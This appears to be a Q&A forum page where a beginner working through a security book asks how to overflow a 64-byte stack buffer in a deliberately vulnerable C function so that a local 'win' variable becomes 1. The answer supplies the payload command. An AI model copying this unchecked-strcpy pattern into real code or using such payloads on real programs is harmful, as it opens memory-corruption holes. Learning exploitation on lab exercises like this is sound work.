CODEWITHSUNDEEP
cassemblystackbuffer-overflow
Syntactic Fructose
Syntactic Fructose

Reputation: 20076

overflowing the stack into a variable confusion(computer security)

I'm learning computer security through a book i've found online(pretty new to this stuff, go easy!), and one chapter teaches you about overflowing the stack. The function used in the program is:

void vuln(int tmp, char *str) {
    //attempting to overflow into tmp, setting win accordingly
    int win = tmp;
    //overflowing this array!
    char buf[64];
    strcpy(buf, str);
    dump_stack((void **) buf, 23, (void **) &tmp);
    printf("win = %d\n", win);
    if (win == 1) {
        printf("You win!\n");
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

What i want to do is overflow buf and set the value of tmp to one, setting win accordingly and letting me win.

Currently i'm using a quick python script to print out 84 letter 'A's to the point where the stack is filled to the variable i want to set the value to. This is the call i make in the command prompt:

./simple_overwrite $(python -c "print 'A'*84)

the output given is:

Stack dump:
> 0xffffd614: 0xffffd803 (second argument)
> 0xffffd610: 0x00000000 (first argument)
> 0xffffd60c: 0x41414141 (saved eip)
> 0xffffd608: 0x41414141 (saved ebp)
> 0xffffd604: 0x41414141
> 0xffffd600: 0x41414141
> 0xffffd5fc: 0x41414141
> 0xffffd5f8: 0x41414141
> 0xffffd5f4: 0x41414141
> 0xffffd5f0: 0x41414141
> 0xffffd5ec: 0x41414141
> 0xffffd5e8: 0x41414141
> 0xffffd5e4: 0x41414141
> 0xffffd5e0: 0x41414141
> 0xffffd5dc: 0x41414141
> 0xffffd5d8: 0x41414141
> 0xffffd5d4: 0x41414141
> 0xffffd5d0: 0x41414141
> 0xffffd5cc: 0x41414141
> 0xffffd5c8: 0x41414141
> 0xffffd5c4: 0x41414141
> 0xffffd5c0: 0x41414141
> 0xffffd5bc: 0x41414141 (beginning of buffer)
> win = 1094795585
> Sorry, you lose.

though i'm not quite sure what to enter in after the script to set the address to point to the value of one, i've tried 0x1 and just 1 but neither worked. Any help is really appreciated, thanks!!

P.S. I know this is quite a bad practice to learn, but keep in mind this is on computer security, I in no way want to put this into use outside of this tutorial.

Upvotes: 0

Views: 198

Answers (1)

Robᵩ
Robᵩ

Reputation: 168596

You've set win to 0x41414141. You want to set it to 1. Try something like this:

./simple_overwrite $(python -c "print 'A'*64 + '\x00\x00\x00\x01'")

or maybe '\x01\x00\x00\x00', depending on the endianness of your computer.

Upvotes: 2

Related Questions